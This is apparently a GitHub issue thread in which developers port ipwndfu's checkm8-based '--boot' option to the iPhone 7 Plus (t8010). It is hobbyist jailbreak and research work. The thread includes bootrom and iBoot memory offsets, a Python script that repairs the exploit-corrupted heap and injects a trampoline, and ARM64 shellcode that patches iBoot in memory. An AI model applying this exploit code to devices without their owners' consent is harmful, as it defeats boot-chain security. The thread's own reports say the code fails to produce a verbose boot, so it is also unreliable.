Trying to port the "--boot" option to iPhone7+ (13.0) without success (help will be appreciated)
```
ipwndfu git:(master) ✗ ./ipwndfu --boot
CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0E ECID:001E78DA04B88D26 IBFL:3C SRTG:[iBoot-2696.0.0.1.33] PWND:[checkm8]
Traceback (most recent call last):
File "./ipwndfu", line 419, in
```
I'm using the following offsets (not sure that all are correct for my platform):
```python
HEAP_BASE = 0x1801B4000          # HEAP BASE can be derived from load_address in main()
HEAP_WRITE_OFFSET = 0x5000       # UNK
HEAP_WRITE_HASH = 0x10000D4EC    # calculate_block_checksum ??
HEAP_CHECK_ALL = 0x10000F8B4     # heap_verify ??
HEAP_STATE = 0x180088BA8         # see heap_set_cookie (chunk_count ??) (pointer to HEAP_BASE)
NAND_BOOT_JUMP = 0x100000628     # initiate a boot...with force_dfu = 0
BOOTSTRAP_TASK_LR = 0x180015F88  # UNK (?? don't know how to find it on my platform)
DFU_BOOL = 0x180088AC0           # dfu_done (see handle_interface_request)
DFU_NOTIFY = 0x10000AEE8         # event_signal (see handle_interface_request)
DFU_STATE = 0x180088AF0          # dfu_event (see handle_interface_request)
TRAMPOLINE = 0x1800AC000         # see platform_get_boot_trampoline()
```
Found one mistake in those offsets: HEAP_WRITE_HASH is 0x10000F364 on A10, not the value listed above. But I still have problems when running HEAP_CHECK_ALL.
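As an added example (not code from this thread or from ipwndfu), a small parser for the DFU banner line printed at the top of the post. It splits the `KEY:VALUE` fields, strips the bracketed values, reports whether the device announces a pwned DFU state (the `PWND` field), and checks the `CPID` against the chip a platform-specific script was written for, since every offset in this thread is only valid for one CPID. The banner string is the one quoted above; the function names are mine.

```python
import re
from typing import Dict

# Constructed sample: the banner quoted in the first post of this thread.
SAMPLE_BANNER = ("CPID:8010 CPRV:11 CPFM:03 SCEP:01 BDID:0E ECID:001E78DA04B88D26 "
                 "IBFL:3C SRTG:[iBoot-2696.0.0.1.33] PWND:[checkm8]")

# KEY:VALUE pairs separated by whitespace; a value is either [bracketed] or a bare token.
_FIELD_RE = re.compile(r"(\w+):(\[[^\]]*\]|\S+)")


def parse_dfu_banner(banner: str) -> Dict[str, str]:
    """Parse the KEY:VALUE fields of a DFU banner into a dict.

    Bracketed values such as SRTG:[iBoot-...] are returned without the brackets.
    Unknown keys are kept verbatim so nothing the device reports is dropped.
    """
    fields: Dict[str, str] = {}
    for key, value in _FIELD_RE.findall(banner):
        if value.startswith("[") and value.endswith("]"):
            value = value[1:-1]
        fields[key] = value
    return fields


def describe_device(banner: str) -> Dict[str, object]:
    """Summarise the banner: chip id, ECID, SecureROM tag and pwned-DFU state.

    A PWND field is only present once an exploit has already been applied to the
    SecureROM, so its presence is the signal an inventory or IR check would flag.
    """
    fields = parse_dfu_banner(banner)
    cpid = int(fields["CPID"], 16)
    return {
        "cpid": cpid,
        "cpid_hex": f"0x{cpid:04X}",
        "ecid": fields.get("ECID"),
        "srtg": fields.get("SRTG"),
        "pwned": "PWND" in fields,
        "pwnd_tag": fields.get("PWND"),
    }


def banner_matches_chip(banner: str, expected_cpid: int) -> bool:
    """True only if the device's CPID is the chip the caller's offsets were derived for.

    Hypothetical guard: a script carrying hard-coded addresses for one SoC should
    refuse to touch memory on any other SoC.
    """
    fields = parse_dfu_banner(banner)
    if "CPID" not in fields:
        return False
    return int(fields["CPID"], 16) == expected_cpid


if __name__ == "__main__":
    print(describe_device(SAMPLE_BANNER))
    print("t8010 offsets applicable:", banner_matches_chip(SAMPLE_BANNER, 0x8010))
```

The `banner_matches_chip` guard is the check missing from the scripts in this thread: all of the addresses discussed here are t8010-specific, and the first thing a tool should do after reading the banner is refuse to run against any other CPID.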
You have correct values for the things you can reasonably find statically now. Try dumping some memory to get the last ones.
Also, even when you get it working, it will take about 10 tries each boot to get it working; it seems very unreliable for the t8010.
> You have correct values for the things you can reasonably find statically now. Try dumping some memory to get the last ones.
I have a mem-dump for the iPhone X vs the iPhone7+
I think one of the issues is the 0x5000 offset where it tries to fix the heap that the checkm8 exploit corrupted. I think that value is not correct for the iPhone 7+,
maybe because the configuration is different...
> Also, even when you get it working, it will take about 10 tries each boot to get it working; it seems very unreliable for the t8010.
why is that? after you fix the heap it should be reliable no?
> why is that? after you fix the heap it should be reliable no?
Not sure, I've been able to consistently pass heap_check_all, but still panic later. I sometimes (rarely) even panic in -p, so I suspect there is just a low failure rate that is exponentially applied when you start doing many things.
> I think one of the issues is the 0x5000 offset where it tries to fix the heap that the checkm8 exploit corrupted. I think that value is not correct for the iPhone 7+
No it is not correct. What repairing the heap does is marking your previously UAF'ed chunks as allocated. Start looking for your untagged chunks, find their offsets and tag them as allocated. Also, try setting 0 instead of HEAP_STATE, pretty sure that was something they added (the pointer to HEAP_STATE in the chunks) somewhere after t8010, but before t8015.
> why is that? after you fix the heap it should be reliable no?
>
> Not sure, I've been able to consistently pass heap_check_all, but still panic later. I sometimes (rarely) even panic in -p, so I suspect there is just a low failure rate that is exponentially applied when you start doing many things.
>
> I think one of the issues is the 0x5000 offset where it tries to fix the heap that the checkm8 exploit corrupted. I think that value is not correct for the iPhone 7+
>
> No it is not correct. What repairing the heap does is marking your previously UAF'ed chunks as allocated. Start looking for your untagged chunks, find their offsets and tag them as allocated. Also, try setting 0 instead of HEAP_STATE, pretty sure that was something they added (the pointer to HEAP_STATE in the chunks) somewhere after t8010, but before t8015.
That seems to work! Thanks! So weird that you must set the padding to 0 to make it work. Can you share with me what BOOTSTRAP_TASK_LR means and how to find it on another platform?
I'm trying to dump its memory on the iPhone X; maybe it will tell me something.
> I'm trying to dump its memory on the iPhone X; maybe it will tell me something.
Yeah, I haven't given you any values so that you can experience finding them yourself. Just dump it on the X and you will see what it is right away, and find its location on your phone too. Just remember the name of it when looking at the value. It's on the stack.
BOOTSTRAP_TASK_LR 0x1800a9f68
```python
import struct

import checkm8
import usbexec

HEAP_BASE = 0x1801B4000          # HEAP BASE can be derived from load_address in main()
HEAP_WRITE_OFFSET = 0x5180       # The base offset in the HEAP that checkm8 corrupted
HEAP_WRITE_HASH = 0x10000F364    # calculate_block_checksum (one of the 2 functions that invoke siphash_aligned) - to find siphash_aligned look for 0x736F6D6570736575
HEAP_CHECK_ALL = 0x10000F8B4     # heap_verify
NAND_BOOT_JUMP = 0x100000628     # initiate a boot...with force_dfu = 0
BOOTSTRAP_TASK_LR = 0x1800a9f68  # address in stack where the code should return to, after calling getDFUImage
DFU_BOOL = 0x180088AC0           # dfu_done (see handle_interface_request)
DFU_NOTIFY = 0x10000AEE8         # event_signal (see handle_interface_request)
DFU_STATE = 0x180088AF0          # dfu_event (see handle_interface_request)
TRAMPOLINE = 0x1800AC000         # see L_boot_trampoline_dst --> last const after main or the value returned by platform_get_boot_trampoline()

# The structs below are heap_blocks:
block1 = struct.pack('<8Q', 0, 0, 0, 0, 2, 132, 128, 0)
block2 = struct.pack('<8Q', 0, 0, 0, 0, 2, 8, 128, 0)

device = usbexec.PwnedUSBDevice()

# Rewrite the four corrupted heap block headers, then recompute each block checksum.
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET, block1)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2)
device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100)
device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180)
print('After Heap repaired.')

# Place the shellcode behind the trampoline and point the bootstrap task's return address at the boot path.
device.write_memory(TRAMPOLINE, checkm8.asm_arm64_branch(TRAMPOLINE, TRAMPOLINE + 0x400))
device.write_memory(TRAMPOLINE + 0x400, open('bin/t8010_shellcode_arm64.bin', 'rb').read())
device.write_memory_ptr(BOOTSTRAP_TASK_LR, NAND_BOOT_JUMP)
device.write_memory(DFU_BOOL, '\x01')
device.execute(0, DFU_NOTIFY, DFU_STATE)
print('Booted.')
```
t8010_shellcode_arm64.S:
```asm
.text
.pool
.set JUMP_BACK, 0x1800AC004
.set WRITE_ADDR, 0x1800c56a0
.set WRITE_VALUE, 0x9100C484

.globl _main
_main:
    MSR DAIFSET, #0xF          // mask all interrupts while patching
    LDR X5, =WRITE_ADDR        // address of the instruction to patch
    LDR W6, =WRITE_VALUE       // replacement opcode
    STR W6, [X5]
    LDR X5, =JUMP_BACK         // return to the trampoline
    BR X5
```
Great. Everything working for you?
No, I never managed to see the verbose boot working even once. I don't know what the problem is. I'm trying to go over the https://github.com/akayn/ipwndfu fork and see what I can do from there.
Hello everyone, I have this error on iPhone 7 Plus (iOS 13.2.3)
```
Traceback (most recent call last):
  File "./ipwndfu", line 48, in <module>
    device = dfu.acquire_device()
  File "/Users/haiderboudjemeline/Desktop/Fichiers/ipwndfu-master/dfu.py", line 16, in acquire_device
    for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
  File "/Users/haiderboudjemeline/Desktop/Fichiers/ipwndfu-master/usb/core.py", line 1263, in find
    raise NoBackendError('No backend available')
usb.core.NoBackendError: No backend available
```
@sitay1 Hi! Can you please explain how you got WRITE_ADDR and WRITE_VALUE in your shell code? Thanks.
I guess it is needed for patching iBoot in memory so that it passes the -v flag to the kernelcache image?
WriteValue is the opcode you want to patch. WriteAddress is where you want to do the patch. If you look in the iBoot code for the iPhone X, you see that it changes X4 from pointing to %s to -v by adding an offset to X4.
Just find the corresponding place in the relevant iBoot code (compare the decrypted iBoot for both platforms).
FYI, I haven't actually managed to get the verbose boot working on A10. So maybe I'm missing something.
On 30 Nov 2019, at 9:48 PM, Krisanov Anton [email protected] wrote:
> I guess it is needed for patching iBoot in memory so that it passes the -v flag to the kernelcache image?
@sitay1 Thanks! So you managed to boot the iPhone 7 with this script, but your shell payload does not lead to a verbose boot? Or does the device not boot at all?
It does boot "normally". I'm not sure whether that is because something is failing and the device boots anyway, or whether it is "by design" and it is just not printing the verbose logs. Can you verify the offset for "-v" that I have used? Does it work for you?
@sitay1 It looks like the bootrom just crashes and we see just a reboot, not a boot "by design". I think so because I tried .set JUMP_BACK, 0x1800AC000 to create an infinite loop, but the device just boots normally.
Tested on iPhone 7 iOS 13.0